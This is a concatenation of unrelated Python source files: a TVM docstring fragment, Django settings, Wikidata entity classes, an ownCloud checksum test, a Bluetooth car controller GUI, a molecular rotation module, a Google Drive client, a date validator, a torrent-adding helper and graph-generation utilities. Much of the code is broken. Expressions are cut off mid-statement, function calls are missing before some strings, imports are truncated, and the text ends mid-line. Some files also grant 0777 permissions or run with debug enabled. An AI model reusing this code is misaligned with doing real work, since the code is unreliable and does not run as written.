bbox_pred : tvm.Tensor 4-D with shape [batch, 4 * num_anchors, height, width] im_info : tvm.Tensor 2-D with shape [batch, 3] scales : list/tuple of float Scales of anchor windoes. ratios : list/tuple of float Ratios of anchor windoes. feature_stride : int The size of the receptive field each unit in the convolution layer of the rpn, for example the product of all stride's prior to this layer. threshold : float Non-maximum suppression threshold. rpn_pre_nms_top_n : int Number of top scoring boxes to apply NMS. -1 to use all boxes. rpn_post_nms_top_n : int Number of top scoring boxes to keep after applying NMS to RPN proposals. rpn_min_size : int Minimum height or width in proposal. iou_loss : bool Usage of IoU loss. Returns ------- out : tvm.Tensor 2-D tensor with shape [batch * rpn_post_nms_top_n, 5]. The last dimension is in format of [batch_index, w_start, h_start, w_end, h_end]. """ # pylint: disable=unused-argument raise ValueError("missing register for")
""" Django settings for ancoweb project. For more information on this file, see For the full list of settings and their values, see """ # Build paths inside the project like this: BASE_DIR / "directory" from pathlib import Path BASE_DIR = Path(__file__).resolve().parent.parent TEMPLATE_DIRS = [str(BASE_DIR / 'templates'), ] STATICFILES_DIRS = [str(BASE_DIR / 'static'), ] # Use 12factor inspired environment variables or from a file import environ env = environ.Env() # Ideally move env file should be outside the git repo # i.e. BASE_DIR.parent.parent env_file = BASE_DIR.parent / 'local.env' if env_file.is_file(): environ.Env.read_env(str(env_file)) # Quick-start development settings - unsuitable for production # See # SECURITY WARNING: keep the secret key used in production secret! # Raises ImproperlyConfigured exception if SECRET_KEY not in os.environ SECRET_KEY = env('SECRET_KEY') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [] # Turn off debug while imported by Celery with a workaround # See import sys if "celery" in sys.argv[0]: DEBUG = False # Application definition INSTALLED_APPS = ( 'django_admin_bootstrapped', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'accounts', 'video_manager', 'video_upload', 'crispy_forms', 'integration_tests', 'djangojs', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'ancoweb.urls' WSGI_APPLICATION = 'ancoweb.wsgi.application' # Database # DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': str(BASE_DIR / 'db.sqlite3'), 'TEST_NAME': str(BASE_DIR / 'tests.sqlite3'), 'TEST': { 'NAME': str(BASE_DIR / 'tests.sqlite3') } } } # Internationalization # LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # MEDIA_URL = '/media/' MEDIA_ROOT = str(BASE_DIR / 'media/') STATIC_URL = '/static/' # Crispy Form Theme - Bootstrap 3 CRISPY_TEMPLATE_PACK = 'bootstrap3' # For Bootstrap 3, change error alert to 'danger' from django.contrib import messages MESSAGE_TAGS = { messages.ERROR: 'danger' } # Progressbar settings FILE_UPLOAD_HANDLERS = ( "video_upload.handlers.VideoUploadHandler", "django.core.files.uploadhandler.MemoryFileUploadHandler", "django.core.files.uploadhandler.TemporaryFileUploadHandler", ) PROGRESSBARUPLOAD_INCLUDE_JQUERY = False # Custom Settings DEFAULT_VIDEO_ICON = 'site/img/default-video-image.png' # A sample logging configuration. The only tangible logging # performed by this configuration is to send an email to # the site admins on every HTTP 500 error when DEBUG=False. # See for # more details on how to customize your logging configuration. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'handlers': { 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, } } # List of callables that know how to import templates from various sources. TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', # 'django.template.loaders.eggs.Loader', ) RECOGNITIONSYS_BIN = './RecognitionSystem/recognitionsystem' USED_VIDEO_EXTENSIONS = ['.mp4', '.webm'] LOGIN_REDIRECT_URL = "/"
__author__ = 'Dani' class WikidataEntity(object): def __init__(self, entity_id, label=None, description=None, aliases=None, outcoming_properties_id=None, incoming_properties_id=None, pg_score=None): self._id = entity_id self._label = label self._description = description if aliases is None: aliases = [] self._aliases = aliases if outcoming_properties_id is None: # Dict with key (id_property) and id (number of times) outcoming_properties_id = {} self._out_prop = outcoming_properties_id if incoming_properties_id is None: incoming_properties_id = {} self._in_prop = incoming_properties_id self._pg_score = pg_score def __str__(self): return self._id @property def id(self): return self._id @property def label(self): return self._label @property def description(self): return self._description @property def aliases(self): for an_alias in self._aliases: yield an_alias @property def n_aliases(self): return len(self._aliases) @property def outcoming_properties_id(self): for a_prop in self._out_prop: for i in range(0, self._out_prop): yield a_prop @property def n_outcoming_properties(self): result = 0 for a_prop in self._out_prop: result += self._out_prop[a_prop] return result @property def distinct_outcoming_properties_id(self): for a_prop in self._out_prop: yield a_prop @property def n_distinct_outcoming_properties_id(self): return len(self._out_prop) @property def incoming_properties_id(self): for a_prop in self._in_prop: for i in range(0, self._in_prop): yield a_prop @property def n_incoming_properties(self): result = 0 for a_prop in self._in_prop: result += self._in_prop[a_prop] return result @property def distinct_incoming_properties_id(self): for a_prop in self._in_prop: yield a_prop @property def n_distinct_incoming_properties_id(self): return len(self._in_prop) @property def pg_score(self): return self._pg_score @pg_score.setter def pg_score(self, value): self._pg_score = value def n_times_incoming_property(self, a_prop): if a_prop in self._in_prop: return self._in_prop[a_prop] else: return 0 def n_times_outcoming_prop(self, a_prop): if a_prop in self._out_prop: return self._out_prop[a_prop] else: return 0 class WikidataProperty(object): def __init__(self, property_id, label=None, description=None, aliases=None, trends=None, outcoming_properties_id=None, incoming_properties_id=None, n_appearances=None, rank=None): self._id = property_id self._label = label self._description = description if aliases is None: aliases = [] self._aliases = aliases if trends is None: trends = [] self._trends = trends if outcoming_properties_id is None: # Dict with key (id_property) and id (number of times) outcoming_properties_id = {} self._out_prop = outcoming_properties_id if incoming_properties_id is None: incoming_properties_id = {} self._in_prop = incoming_properties_id self._n_appearances = n_appearances self._rank = rank def __str__(self): return self._id @property def id(self): return self._id @property def label(self): return self._label @property def description(self): return self._description @property def aliases(self): for an_alias in self._aliases: yield an_alias @property def n_aliases(self): return len(self._aliases) @property def trends(self): for a_trend in self._trends: yield a_trend def add_trend(self, a_trend): self._trends.append(a_trend) @property def n_trends(self): return len(self._trends) @property def outcoming_properties_id(self): for a_prop in self._out_prop: for i in range(0, self._out_prop): yield a_prop @property def n_outcoming_properties(self): result = 0 for a_prop in self._out_prop: result += self._out_prop[a_prop] return result @property def distinct_outcoming_properties_id(self): for a_prop in self._out_prop: yield a_prop @property def n_distinct_outcoming_properties_id(self): return len(self._out_prop) @property def incoming_properties_id(self): for a_prop in self._in_prop: for i in range(0, self._in_prop): yield a_prop @property def n_incoming_properties(self): result = 0 for a_prop in self._in_prop: result += self._in_prop[a_prop] return result @property def distinct_incoming_properties_id(self): for a_prop in self._in_prop: yield a_prop @property def n_distinct_incoming_properties_id(self): return len(self._in_prop) @property def n_appearances(self): return self._n_appearances @n_appearances.setter def n_appearances(self, value): self._n_appearances = value @property def rank(self): return self._rank @rank.setter def rank(self, value): self._rank = value def n_times_incoming_property(self, a_prop): if a_prop in self._in_prop: return self._in_prop[a_prop] else: return 0 def n_times_outcoming_prop(self, a_prop): if a_prop in self._out_prop: return self._out_prop[a_prop] else: return 0 ##### LITERAL_TYPES TYPE_UNKOWN = -1 TYPE_NUMBER = 0 TYPE_STRING = 1 class WikidataLiteral(object): def __init__(self, value, literal_type=None): self._value = value self._type = literal_type @property def value(self): return self._value @property def type(self): return self._type def __str__(self): return str(self._value) class WikidataTriple(object): def __init__(self, subject, predicate, target_object): self._subject = subject self._predicate = predicate self._object = target_object @property def subject(self): return self._subject @property def predicate(self): return self._predicate @property def object(self): return self._object def __str__(self): return str(self.subject) + ", " + str(self._predicate) + ", " + str(self.object)
from smashbox.utilities import * from smashbox.utilities.hash_files import * from smashbox.protocol import chunk_file_upload, file_upload, file_download import smashbox.protocol import os import os.path @add_worker def main(step): d = make_workdir() reset_owncloud_account() URL = oc_webdav_url()'*** 0. upload without the checksum (files should be accepted by the server)') filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1)) filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3)) # upload the file without a checksum and then download it to get the checksum type used by the server file_upload(filename1,URL) chunk_file_upload(filename2,URL) file_download(os.path.basename(filename1),URL,d) r=file_download(os.path.basename(filename2),URL,d) analyse_hashfiles(d) # make sure that files uploaded without a checksum are not corrupted'Got checksum from the server: %s', r.headers['OC-Checksum']) try: active_server_checksum_type = r.headers['OC-Checksum'].strip().split(':')[0] except KeyError,x: logger.warning('Checksum not enabled for %s',oc_webdav_url(hide_password=True)) return # now check the checksum type supported on the server'Server supports %s checksum',repr(active_server_checksum_type)) smashbox.protocol.enable_checksum(active_server_checksum_type)'*** 1. upload with correct checksum (files should be accepted by the server)') filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1)) filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3)) file_upload(filename1,URL) chunk_file_upload(filename2,URL) file_download(os.path.basename(filename1),URL,d) file_download(os.path.basename(filename2),URL,d) analyse_hashfiles(d) # pass around incorrect checksum (of the type supported by the server) # the puts should be failing def corrupted_checksum(fn): c = smashbox.protocol.compute_checksum(fn) c = c[:-1]+chr(ord(c[-1])+1) return c'*** 2. upload with corrupted checksum value (files should be refused by the server)') filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1)) filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3)) r = file_upload(filename1,URL,checksum=corrupted_checksum(filename1)) fatal_check(r.rc == 412) r = chunk_file_upload(filename2,URL,checksum=corrupted_checksum(filename2)) fatal_check(r.rc == 412) # paranoia check: make sure that the server did not store the corrupted files inspite of returning 412 d_corrupted = mkdir(os.path.join(d,'corrupted_files')) file_download(os.path.basename(filename1),URL,d_corrupted) file_download(os.path.basename(filename2),URL,d_corrupted) fatal_check(os.listdir(d_corrupted)==[]) # pass around a checksum of the type unsupported by the server, including some garbage types (which are not even well-formatted) # in this case the checksums should be ignored and the files transmitted as if checksum was not provided at all checksum_types = list(set(smashbox.protocol.known_checksum_types)-set([active_server_checksum_type])) checksum_types += ['blabla']'*** 3. upload with corrupted checksum types and strange values (files should be accepted by the server)') for value in ['',':bah',':']: for cstype in checksum_types: smashbox.protocol.enable_checksum(cstype) filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1)) filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3))' *** testing checkum value: '+cstype+value) file_upload(filename1,URL,checksum=cstype+value) chunk_file_upload(filename2,URL,checksum=cstype+value) file_download(os.path.basename(filename1),URL,d) file_download(os.path.basename(filename2),URL,d) analyse_hashfiles(d)
#!/usr/bin/python import pygtk import pygame from pygame.locals import * pygtk.require('2.0') import gtk import os import wheel import sys, select, tty, termios, bluetooth, time from evdev import InputDevice, categorize, ecodes # Device Input import threading import gobject #from lib import xbox_read # Controller Lib # =====> GUI Class class Base(gtk.Window): def destroy(self, widget, data=None): print('you closed the window') gtk.main_quit() def forward(self, widget, data=None): print('you click the forward button') def backwards(self, widget, data=None): print('you clicked the back button') def left(self, widget, data=None): print('you clicked the left button') def right(self, widget, data=None): print('you clicked the right button') def cruise(self, widget, data=None): print("you be crusing") def selection_changed(self, widget, data=None): print ("keyboard selected") def xboxController(self, widget, data=None): print ("xbox selected") def wheelController(self, widget, data=None): print("wheel selected") def selection_changed( self, w, data=None): self.label.set_label( "Current selection: <b>%s</b>" % data) def __init__(self): super(Base, self).__init__() if Car().test("00:12:05:09:94:45"): print "[...]\033[92m Connection Successful \033[0m[...]" else: print "[...]\033[91m Connection Failed \033[0m [...]" carClass = Car() self.sock = carClass.connecting("00:12:05:09:94:45") WINX = 300 WINY = 200 self.set_title("Car GUI") self.set_size_request(WINX, WINY) self.set_position(gtk.WIN_POS_CENTER) self.set_resizable(False) # Creating the buttons and other widgets btn3Turn = gtk.Button("3-P Turn") btnMenu = gtk.Button("Menu") btnCruise = gtk.Button("Cruise") btnSpazz = gtk.Button("Random") btnStop = gtk.Button("STOP!!!") self.progbar = gtk.ProgressBar() self.progbar2 = gtk.ProgressBar() frame = gtk.Frame("Car's Movement") lblAction = gtk.Label("<b>The car is moving / action /</b>") lblAction.set_justify(gtk.JUSTIFY_CENTER) lblAction.set_size_request(235,60) lblAction.set_use_markup(True) frame.set_label_align(0.5,0.5) frame.add(lblAction) #setting size btnSpazz.set_size_request(80,30) btnCruise.set_size_request(80, 30) btnMenu.set_size_request(80, 40) btn3Turn.set_size_request(80, 30) btnStop.set_size_request(80,30) fixed = gtk.Fixed() self.progbar.set_orientation(gtk.PROGRESS_BOTTOM_TO_TOP) self.progbar2.set_orientation(gtk.PROGRESS_BOTTOM_TO_TOP) fixed.put(frame, 30,10) # positioning the widgets fixed.put(btnCruise ,110 ,110) fixed.put(btnSpazz ,210 ,110) fixed.put(btnMenu ,10 , 110) fixed.put(btn3Turn ,210 , 160) fixed.put(btnStop,110, 160) fixed.put(self.progbar,10, 10) fixed.put(self.progbar2,275, 10) self.add(fixed) self.realize() print 'gogogo' self.connect("destroy", gtk.main_quit) # Force SDL to write on our drawing area os.putenv('SDL_WINDOWID', str(self.window.xid)) gtk.gdk.flush() pygame.init() pygame.display.set_mode((WINX,WINY),0,0) screen = pygame.display.get_surface() gobject.idle_add(pygame.display.update) self.show_all() # screen = pygame.display.get_surface() # self.joystick = pygame.joystick.Joystick(0) # self.joystick.init() # wheelClass = wheel.WheelClass(self.joystick) time.sleep(5) print "Running keyboard thread" KeyboardThread = carClass.keyboard() # =====> Car Class class Car: x = 1 y = 1 last = 0 # screen = pygame.display.get_surface() pygame.joystick.init() joystick = pygame.joystick.Joystick(0) # self.joystick.init() print "Joystick initialized" wheelClass = wheel.WheelClass(joystick) #def __init__(self): def moveX(self, st): self.x = st def moveY(self, st): self.y = st def move(self, spd): arra = [[5,1,6], [3,0,4], [7,2,8]] ch = (16 * arra[self.y][self.x]) + spd if self.last != ch: self.sock.send(chr(ch)) self.last = ch def keyboard(self): print "Keyboard" # loop around each key press while True: # Starts pulling keyboard inputs from pygame pygame.event.pump() # Sets keyboard inputs to a variable self.pressed = pygame.key.get_pressed() # if either the up/down button is pressed, set the Y axes to if self.pressed[K_UP]: self.moveY(0) elif self.pressed[K_DOWN]: self.moveY(2) else: self.moveY(1) # if either the left/right button is pressed, set the X axes to if self.pressed[K_LEFT]: self.moveX(0) elif self.pressed[K_RIGHT]: self.moveX(2) else: self.moveX(1) # Will run the move function, move with set the X/Y vars and move the car accordingly self.move(8) # If the escape key is pressed, exit if self.pressed[K_ESCAPE]: break def controllerXbox(self): # Will catch errors try: # loop around xbox events for event in xbox_read.event_stream(deadzone=12000): # if either the up/down button is pressed, set the Y axes to if event.key == 'Y1' and event.value > 1: self.moveY(2) elif event.key == 'Y1' and event.value < 1: self.moveY(0) else: self.moveY(1) # if either the left/right button is pressed, set the X axes to if event.key == 'X1' and event.value > 1: self.moveX(2) elif event.key == 'X1' and event.value < 1: self.moveX(0) else: self.moveX(1) move((int(event.value) /2200)) except: print '[...] Error With Controller [...]' def controllerPs3(self): print '[...] Ps3 Controller [...]' def wheelHandler(self): while True: direction,turning,speed=self.wheelClass.getMov() self.y = direction self.x = turning self.move(speed) def connecting(self,bdr_addr): try: self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) self.sock.connect((bdr_addr, 1)) return sock except: return '' def test(self,mac): try: testSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) testSock.connect((mac, 1)) testSock.close() time.sleep(1) return True except: return False ##### Accelerometer ##### def axelmeter(self, speed): self.progbar.set_fraction(speed/11.0) if __name__ == "__main__": # cli_menu() Base() GUIthread = grk.main() print "Starting GUI thread" GUIthread.start() GUIthread.join()
import numpy as np from an_utils import to_massweight_coor def get_rot_dict(atoms, basepos, branch, symnumber=1, indices=None, rot_axis=None): """Define the rotational mode. Get rotational axis, mode vector, and moment of inertia """ basepos_arr = np.array(basepos) branch_arr = np.array(branch) assert (np.all(branch_arr < atoms.get_number_of_atoms())), \ '\nBad branch - contains higher atom index than available' # Finding rot axis COM = atoms[branch].get_center_of_mass() if rot_axis is None: # 'Guess' rotation axis rot_axis_arr = basepos_arr-COM else: # User specified rotation axis rot_axis_arr = np.array(rot_axis) axis_norm = np.linalg.norm(rot_axis_arr) assert (not np.allclose(axis_norm, 0, 1e-5, 1e-7)), \ """\nCould not determine rotation axis, length of axis vector is Possible cause: center of mass is same as specified point""" rot_axis_arr = rot_axis_arr/axis_norm moment_of_intertia = get_moment_of_intertia( atoms[branch], basepos, rot_axis_arr) mode_tangent = calculate_rot_mode( atoms, basepos_arr, rot_axis_arr, branch_arr) # defining the normal mode only in the indices used for the # vibrational analysis if indices is not None: mode_tangent = mode_tangent.reshape((-1, 3))[indices].ravel() else: indices = range(len(atoms)) mode_tangent_mass_weighted = to_massweight_coor( mode_tangent, atoms, indices=indices) return { 'type': 'rotation', 'symnumber': symnumber, 'base_pos': basepos_arr, 'branch': branch_arr, 'rot_axis': rot_axis_arr, 'mode_tangent': mode_tangent, 'mode_tangent_mass_weighted': mode_tangent_mass_weighted, 'inertia': moment_of_intertia, 'indices': indices, } def get_moment_of_intertia(atoms, x0, r_rot): """Returns the moment of intertia """ I = 0. atom_p = atoms.get_positions() atom_m = atoms.get_masses() for ap, am in zip(atom_p, atom_m): I += sum(np.cross(r_rot, ap-x0)**2.)*am return I def calculate_rot_mode(atoms, base_pos, rot_axis, branch_arr, mass_weight=True, normalize=True): """ Calculates the rotation mode for specified branch. Each atom in the branch rotates around the given rotation axis, which is perpendicular to the rotation axis and the radial vector: v_rot = v_axis cross (B->A) v_rot are weighted by distance from center of axis v_rot are also transformed into mass-weighted coordinates """ ap = atoms.get_positions() v_zero = np.zeros(3*len(ap)) v_rot = v_zero.reshape(-1, 3) BC = rot_axis/np.linalg.norm(rot_axis) # For each atom find vector and weight to rotation axis for i in branch_arr: BA = np.array(ap[i])-np.array(base_pos) BA = BA -, BC) v_rot[i] = np.cross(BC, BA) v_rot = np.ravel(v_rot) if mass_weight: v_rot = to_massweight_coor(v_rot, atoms) if normalize: v_rot = v_rot / np.linalg.norm(v_rot) return v_rot def rotatepoints(rotationcenter, rotationaxis, angle, atompos): """ Rotate some coordinates See Args: rotationcenter (numpy array): center for rotation rotationaxis (numpy array): axis to rotate around angle (float): angle to rotate in radians atompos (numpy array): positions to rotate """ x0 = np.matrix(rotationcenter) u = np.matrix(rotationaxis) ap = np.matrix(atompos) natoms = ap.shape[0] rp = np.zeros([natoms, 3]) R = np.matrix([ [ np.cos(angle)+u[0, 1]**2*(1.-np.cos(angle)), u[0, 1]*u[0, 1]*(1.-np.cos(angle))-u[0, 2]*np.sin(angle), u[0, 1]*u[0, 2]*(1.-np.cos(angle))+u[0, 1]*np.sin(angle)], [ u[0, 1]*u[0, 0]*(1.-np.cos(angle))+u[0, 2]*np.sin(angle), np.cos(angle)+u[0, 1]**2*(1.-np.cos(angle)), u[0, 1]*u[0, 2]*(1.-np.cos(angle))-u[0, 0]*np.sin(angle)], [ u[0, 2]*u[0, 0]*(1.-np.cos(angle))-u[0, 1]*np.sin(angle), u[0, 2]*u[0, 1]*(1.-np.cos(angle))+u[0, 0]*np.sin(angle), np.cos(angle)+u[0, 2]**2*(1.-np.cos(angle))]]) # Repeat center coordinate natoms rows x0 = np.tile(x0, [natoms, 1]) # Vectors from rot center for all atoms ap = ap - x0 # Apply rotation transformation rp =, ap.T) # Adding the offset rp = rp.T + x0 return rp
#!/usr/bin/python import sys from sys import platform as _platform sys.argv = [''] import os.path import subprocess from gdrive.pydrive.auth import GoogleAuth from import GoogleDrive file_type = { 'folder': 'application/' } class GoogleDriveClient(): def __init__(self): print("Google Drive client, written in Python by G. Chanson") def connect(self): gauth = GoogleAuth() gauth.LocalWebserverAuth() = GoogleDrive(gauth) def list_dir_files(self, dir_id='root'): query = "'%s' in parents and trashed=false" % dir_id files ={'q': query}) return files.GetList() def list_trash_files(self): query = "trashed=true" files ={'q': query}) return files.GetList() def download_file(self, fileId, file_name=None): if file_name is not None: if os.path.isfile(file_name): print('File already exists at %s' % file_name) return file_name file ={'id': fileId}) if file_name is None: file_name = file['title'] file.GetContentFile(file_name) print('Downloaded file %s to %s' % (file['title'], file_name)) return file_name def upload_file(self, filename): file = file.SetContentFile(filename) tmp = filename.split('/') file["title"] = tmp[-1] file.Upload() print('Uploaded %s' % file["title"]) def trash_file(self, fileId): file ={'id': fileId}) file.Trash() print('Trashed file %s' % file['title']) def untrash_file(self, fileId): file ={'id': fileId}) file.UnTrash() print('UnTrashed file %s' % file['title']) def delete_file(self, fileId): file ={'id': fileId}) file.Delete() print('Deleted file %s' % file['title']) def rename_file(self, fileId, file_name): file ={'id': fileId}) file['title'] = file_name file.Upload() print('Uploaded file %s' % file['title']) def open_file(self, fileId): file_path = self.download_file(fileId, '/tmp/' + fileId) if _platform == "linux" or __platform == "linux2":['xdg-open', file_path]) elif _platform == "darwin":['open', file_path]) elif _platform == "win32":['start', file_path]) gdrive = GoogleDriveClient()
#!/usr/bin/env python import calendar from datetime import date from time import strptime # Function to validate DOB input # validate_dob("1985", "November", "18") def validate_dob(y, m, d): # Validating year try: if len(y) == 4 and not int(y) > # Year length must be 4 digits and be in the past year = True else: year = False except ValueError: year = False # Validating month try: for n in calendar.month_name: # Checking to see if user inputted month is in calendar if m == n: month = True break else: month = False except ValueError: month = False; # Validating day try: validDays = calendar.monthrange(int(y), strptime(m[0:3], "%b").tm_mon) # Getting valid number of days for specified month/year from the calendar if int(d) > 0 and int(d) <= validDays[1]: # Checking to see if user inputted day is valid day = True else: day = False except ValueError: day = False # Checking if year, month and date are all valid if True == year and True == month and True == day: return True else: return False
import base64 import os import os.path from django.db import transaction from WhatManager2.locking import LockModelTables from WhatManager2.utils import norm_t_torrent from home.models import ReplicaSet, DownloadLocation, TorrentAlreadyAddedException from myanonamouse.models import MAMTorrent, MAMTransTorrent def add_mam_torrent(torrent_id, instance=None, location=None, mam_client=None, add_to_client=True): mam_torrent = MAMTorrent.get_or_create(mam_client, torrent_id) if not instance: instance = ReplicaSet.get_myanonamouse_master().get_preferred_instance() if not location: location = DownloadLocation.get_myanonamouse_preferred() with LockModelTables(MAMTransTorrent): try: MAMTransTorrent.objects.get(info_hash=mam_torrent.info_hash) raise TorrentAlreadyAddedException(u'Already added.') except MAMTransTorrent.DoesNotExist: pass download_dir = os.path.join(location.path, unicode( def create_b_torrent(): new_b_torrent = MAMTransTorrent( instance=instance, location=location, mam_torrent=mam_torrent, info_hash=mam_torrent.info_hash, ) return new_b_torrent if add_to_client: with transaction.atomic(): b_torrent = create_b_torrent() t_torrent = instance.client.add_torrent( base64.b64encode(mam_torrent.torrent_file), download_dir=download_dir, paused=False ) t_torrent = instance.client.get_torrent(, arguments=MAMTransTorrent.sync_t_arguments) if not os.path.exists(download_dir): os.mkdir(download_dir) if not os.stat(download_dir).st_mode & 0777 == 0777: os.chmod(download_dir, 0777) norm_t_torrent(t_torrent) b_torrent.sync_t_torrent(t_torrent) else: b_torrent = create_b_torrent() return b_torrent
#!/usr/bin/env python #-*- coding:utf-8 -*- """ Generation tools for NNGT """ import logging import numpy as np import scipy.sparse as ssp from scipy.spatial.distance import cdist from numpy.random import randint import nngt from nngt.lib import InvalidArgument, nonstring_container from nngt.lib.logger import _log_message logger = logging.getLogger(__name__) __all__ = [ "_check_num_edges", "_compute_connections", "_filter", "_no_self_loops", "_set_degree_type", "_set_options", "_unique_rows", "dist_rule", "max_proba_dist_rule" ] def _set_options(graph, population, shape, positions): ''' Make a graph a network or spatial ''' if population is not None: nngt.Graph.make_network(graph, population) if shape is not None or positions is not None: nngt.Graph.make_spatial(graph, shape, positions) def _compute_connections(num_source, num_target, density, edges, avg_deg, directed, reciprocity=-1): assert (density, edges, avg_deg) != (None, None, None), \ "At leat one of the following entries must be specified: 'density', " \ "'edges', 'avg_deg'." pre_recip_edges = 0 if avg_deg is not None: pre_recip_edges = int(avg_deg * num_source) elif edges is not None: pre_recip_edges = int(edges) else: pre_recip_edges = int(density * num_source * num_target) dens = pre_recip_edges / float(num_source * num_target) edges = pre_recip_edges if edges: if reciprocity > max(0,(2.-1./dens)): frac_recip = ((reciprocity - 1. + np.sqrt(1. + dens*(reciprocity - 2.))) / (2. - reciprocity)) if frac_recip < 1.: pre_recip_edges = int(edges/(1+frac_recip)) else: raise InvalidArgument( "Such reciprocity cannot be obtained, request ignored.") elif reciprocity > 0.: raise InvalidArgument( "Reciprocity cannot be lower than 2-1/density.") return edges, pre_recip_edges def _check_num_edges(source_ids, target_ids, num_edges, directed, multigraph, return_sets=False): num_source, num_target = len(source_ids), len(target_ids) source_set, target_set = None, None has_only_one_population = (num_source == num_target) if has_only_one_population: source_set = set(source_ids) target_set = set(target_ids) has_only_one_population = (source_set == target_set) if not has_only_one_population and not multigraph: b_d = (num_edges > num_source*num_target) b_nd = (num_edges > int(0.5*num_source*num_target)) if (not directed and b_nd) or (directed and b_d): raise InvalidArgument("Required number of edges is too high") elif has_only_one_population and not multigraph: b_d = (num_edges > num_source*(num_target-1)) b_nd = (num_edges > int(0.5*(num_source-1)*num_target)) if (not directed and b_nd) or (directed and b_d): raise InvalidArgument("Required number of edges is too high") if return_sets: return has_only_one_population, source_set, target_set return has_only_one_population def _set_degree_type(degree_type): deg_map = { "in-degree": "in", "out-degree": "out", "total-degree": "total", "in": "in", "out": "out", "total": "total" } try: degree_type = deg_map[degree_type] except KeyError: raise ValueError("`degree_type` must be either 'in', 'out', 'total', " "or the full version 'in-degree', 'out-degree', " "'total-degree'.") return degree_type # ------------------------- # # Edge checks and filtering # # ------------------------- # def _unique_rows(arr, return_index=False): ''' Keep only unique edges ''' b = np.ascontiguousarray(arr).view( np.dtype((np.void, arr.dtype.itemsize * arr.shape[1]))) b, idx = np.unique(b, return_index=True) unique = b.view(arr.dtype).reshape(-1, arr.shape[1]).astype(int) if return_index: return unique, idx return unique def _no_self_loops(array, return_test=False): ''' Remove self-loops ''' test = array[:, 0] != array[:, 1] if return_test: return array[test, :].astype(int), test return array[test, :].astype(int) def _filter(ia_edges, ia_edges_tmp, num_ecurrent, edges_hash, b_one_pop, multigraph, directed=True, recip_hash=None, distance=None, dist_tmp=None): ''' Filter the edges: remove self loops and multiple connections if the graph is not a multigraph. ''' if b_one_pop: ia_edges_tmp, test = _no_self_loops(ia_edges_tmp, return_test=True) if dist_tmp is not None: dist_tmp = dist_tmp[test] if not multigraph: num_ecurrent = len(edges_hash) if distance is not None: for e, d in zip(ia_edges_tmp, dist_tmp): tpl_e = tuple(e) if tpl_e not in edges_hash: if directed or tpl_e not in recip_hash: ia_edges[num_ecurrent] = e distance.append(d) edges_hash.add(tpl_e) if not directed: recip_hash.add(tpl_e[::-1]) num_ecurrent += 1 else: for e in ia_edges_tmp: tpl_e = tuple(e) if tpl_e not in edges_hash: if directed or tpl_e not in recip_hash: ia_edges[num_ecurrent] = e edges_hash.add(tpl_e) if not directed: recip_hash.add(tpl_e[::-1]) num_ecurrent += 1 else: num_added = len(ia_edges_tmp) ia_edges[num_ecurrent:num_ecurrent + num_added, :] = ia_edges_tmp num_ecurrent += num_added if distance is not None: distance.extend(dist_tmp) return ia_edges, num_ecurrent def _cleanup_edges(g, edges, attributes, duplicates, loops, existing, ignore): ''' Cleanup an list of edges. ''' loops_only = loops and not (duplicates or existing) new_edges = None new_attr = {} directed = g.is_directed() if loops_only: edges = np.asarray(edges) new_edges, test = _no_self_loops(edges, return_test=True) if len(new_edges) != len(edges): if ignore: _log_message(logger, "WARNING", "Self-loops ignored: {}.".format(edges[~test])) else: raise InvalidArgument( "Self-loops are present: {}.".format(edges[~test])) new_attr = {k: np.asarray(v)[test] for v, k in attributes.items()} else: # check (also) either duplicates or existing new_attr = {key: [] for key in attributes} edge_set = set() new_edges = [] if existing: edge_set = {tuple(e) for e in g.edges_array} for i, e in enumerate(edges): tpl_e = tuple(e) if tpl_e in edge_set or (not directed and tpl_e[::-1] in edge_set): if ignore: _log_message(logger, "WARNING", "Existing edge {} ignored.".format(tpl_e)) else: raise InvalidArgument( "Edge {} already exists.".format(tpl_e)) elif loops and e[0] == e[1]: if ignore: _log_message(logger, "WARNING", "Self-loop on {} ignored.".format(e[0])) else: raise InvalidArgument("Self-loop on {}.".format(e[0])) else: edge_set.add(tpl_e) new_edges.append(tpl_e) if not directed: edge_set.add(tpl_e[::-1]) for k, vv in attributes.items(): if nonstring_container(vv): new_attr[k].append(vv[i]) else: new_attr[k].append(vv) new_edges = np.asarray(new_edges) return new_edges, new_attr # ------------- # # Distance rule # # ------------- # def dist_rule(rule, scale, pos_src, pos_targets, dist=None): ''' DR test from one source to several targets Parameters ---------- rule : str Either 'exp', 'gaussian', or 'lin'. scale : float Characteristic scale. pos_src : array of shape (2, N) Positions of the sources. pos_targets : array of shape (2, N) Positions of the targets. dist : list, optional (default: None) List that will be filled with the distances of the edges. Returns ------- Array of size N giving the probability of the edges according to the rule. ''' vect = pos_targets - 